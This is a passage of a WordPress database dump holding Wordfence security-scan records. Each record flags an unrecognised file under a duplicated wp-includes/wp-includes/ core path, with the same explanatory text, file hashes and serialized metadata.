More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/nav-menu-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27499,1631424938,1631424938,'new','knownfile',75,'e38a7d723c40606695626ae6c3742cf8','0e99e3bb204441bc65cf49a521b19c00','Unknown file in WordPress core: wp-includes/wp-includes/nav-menu.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/nav-menu.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27500,1631424938,1631424938,'new','knownfile',75,'be55f2e3a0826101a283b4f4b4b1dc1d','8f1384c587abbbe26822e2ad221e17ef','Unknown file in WordPress core: wp-includes/wp-includes/option.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/option.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27501,1631424939,1631424939,'new','knownfile',75,'a590fea8bb249cfa447b9ac12983c771','f722b89d18c6d764ae03bf7f14266ba5','Unknown file in WordPress core: wp-includes/wp-includes/pluggable-deprecated.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/pluggable-deprecated.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27502,1631424939,1631424939,'new','knownfile',75,'04e0b2f7086563cd5c1415e36c5f0f9b','f402a137241f8062671cfeb4dd6c2fbd','Unknown file in WordPress core: wp-includes/wp-includes/pluggable.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/pluggable.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27503,1631424939,1631424939,'new','knownfile',75,'e831e162b44e093eb531d65f67e7de70','cd19fbaeeb17f178a0254ab2dc4792bf','Unknown file in WordPress core: wp-includes/wp-includes/plugin.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/plugin.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27504,1631424939,1631424939,'new','knownfile',75,'0b00baa4739595b94c2ff8031678dcbe','c0af213c344cf0db5e154a004c9d81a1','Unknown file in WordPress core: wp-includes/wp-includes/post-formats.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/post-formats.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27505,1631424939,1631424939,'new','knownfile',75,'08bbd3714d9dd3c3fb1b4e7ee4535c9d','a3ba9bc7f45bb80c7264d16786469307','Unknown file in WordPress core: wp-includes/wp-includes/post-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/post-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27506,1631424939,1631424939,'new','knownfile',75,'59ef630a2d95b414ffebbfe590c8973a','c39917605eee6378d1516ec74ade53bc','Unknown file in WordPress core: wp-includes/wp-includes/post-thumbnail-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/post-thumbnail-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27507,1631424939,1631424939,'new','knownfile',75,'1106e612b0dc193a86cf721e999ed09f','5a42cf21699ebe8d957051fc25ab0b13','Unknown file in WordPress core: wp-includes/wp-includes/post.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/post.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27508,1631424939,1631424939,'new','knownfile',75,'b95988d058b6d4e934245e9e8e875b57','fd8dec24eccdf13b78d77621f0cf3f32','Unknown file in WordPress core: wp-includes/wp-includes/query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27509,1631424939,1631424939,'new','knownfile',75,'e3e218d83104484c2f68a70e83e52425','33211c16796eef6c9cfa68f197bb710d','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/byte_safe_strings.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/random_compat/byte_safe_strings.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27510,1631424939,1631424939,'new','knownfile',75,'8643c21e03db0690d2852f9593a112b8','f2bfda893aa7e38c12523864a85212b4','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/cast_to_int.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/random_compat/cast_to_int.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27511,1631424939,1631424939,'new','knownfile',75,'71dcaa912f379b128bc4d4ad305b83c9','20717ede3e875f1141f93aa829677f9e','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/error_polyfill.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/random_compat/error_polyfill.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27512,1631424939,1631424939,'new','knownfile',75,'c61dc4775b443d144519cba8812fa63d','b80cfa1b47f19ba886f900412fdf11a4','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/random_compat/random.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27513,1631424939,1631424939,'new','knownfile',75,'351bf7722138c140b01e115b633854d6','49f2c7d4e4b618e24903df6563873e00','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27514,1631424939,1631424939,'new','knownfile',75,'be99931db52bc3ca523dd6336e6f9aaa','9b6ef490e089bae8e417ffc681164086','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27515,1631424939,1631424939,'new','knownfile',75,'1c2ef4463ea923b65c885a250e2faaa7','66f2fde291e546ff1849445f6b6ab164','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_libsodium.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/random_compat/random_bytes_libsodium.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27516,1631424939,1631424939,'new','knownfile',75,'368b699a2162d51273d546bfff6123a0','1f798741e7215f9579ac3f3a2265e752','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27517,1631424940,1631424940,'new','knownfile',75,'5290942e4a3d28255cb4f6c32453652b','505c8eb72c85c27eddad356c403c718c','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27518,1631424940,1631424940,'new','knownfile',75,'8577eec4e449522bd52675a9d1164dce','8a88f417e287d132dad04875b3de6158','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_int.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/random_compat/random_int.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27519,1631424940,1631424940,'new','knownfile',75,'c985626ac8203081c2bf9170bef212f7','eaa8d763984747c6d02c4c99abb56ee6','Unknown file in WordPress core: wp-includes/wp-includes/registration-functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/registration-functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27520,1631424940,1631424940,'new','knownfile',75,'ec18e4347927903e8c0353def5a4b100','b5971e1b7d4905410490e656864dca2c','Unknown file in WordPress core: wp-includes/wp-includes/registration.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/registration.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27521,1631424940,1631424940,'new','knownfile',75,'9474425fdcd2623cf89f32d33382ef32','15a5e0fe1ea3489c74ff701511b8c480','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/class-wp-rest-request.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/rest-api/class-wp-rest-request.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27522,1631424940,1631424940,'new','knownfile',75,'95db3451356a32ba9aa1e9db1c9f9b9e','7ca61bfb7d969253e394cd5acdc9dd5a','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/class-wp-rest-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/rest-api/class-wp-rest-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27523,1631424940,1631424940,'new','knownfile',75,'676a0be0ab06203a3c2ac37271d222fa','abee2290d00499263b7b98c1062b15af','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/class-wp-rest-server.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/rest-api/class-wp-rest-server.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27524,1631424940,1631424940,'new','knownfile',75,'1d747ea2f4eb22ae78b3e4e88eced53b','4e9aac160473f0c078ab7a5e5e7eff38','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:93:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27525,1631424940,1631424940,'new','knownfile',75,'4f9b8b5f2288c8f35fef26c470afe5bd','908db93776ba706fb39c650488808d16','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27526,1631424940,1631424940,'new','knownfile',75,'6a3fed75810919a8db1f0e0aa57dd392','4a9e4ad9e4b8a1dfd9f8f191287eaa96','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27527,1631424940,1631424940,'new','knownfile',75,'ce34abdf38fc88446f985dcd2c216bf2','4de8b6542e99f8bf1106f4f500a38d6f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:87:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27528,1631424940,1631424940,'new','knownfile',75,'bce77a25907aeb99637a005751351d84','687e7e524f5065b37fec2bf180f8b9c6','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:86:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27529,1631424940,1631424940,'new','knownfile',75,'69a5cc07bfabbf5b34b42f0d6222fa74','0162bf378ac9de26544f8dd8f267223f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27530,1631424940,1631424940,'new','knownfile',75,'ffdd077ceeb1366fc94221839bca28fd','2d434f7fd2bf0759c35cd70449096c23','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27531,1631424940,1631424940,'new','knownfile',75,'44a4e1b5100ae4ffd804ace606b13f3d','087ceea0cafafd9840756c02fba7d771','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:80:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27532,1631424940,1631424940,'new','knownfile',75,'3475d0a18f07bafd4c1727c74dfc8ea3','2cacfd2dfca4bc34df17969bddd38d16','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27533,1631424940,1631424940,'new','knownfile',75,'c031562823b12eecea6c1351a5a63462','2f4a7bab741f7d229e36e5aa2ebc9f43','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:79:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27534,1631424941,1631424941,'new','knownfile',75,'080830e335547a845b954ab4bbdbcf9a','5dce5d1295e146acc205263e08a1dd3a','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:85:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27535,1631424941,1631424941,'new','knownfile',75,'342c923cf53733360044ce4313e9925e','8ddd7fad0d827ff52350275955e48925','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27536,1631424941,1631424941,'new','knownfile',75,'d778c130552313ef1d9af6681853d56f','47492d69823774506f70a1008749aaeb','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27537,1631424941,1631424941,'new','knownfile',75,'13d100b9055dcc9bae9c0c39bbb53afb','5522beaaf1b2d748aa9c4cec2937a684','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 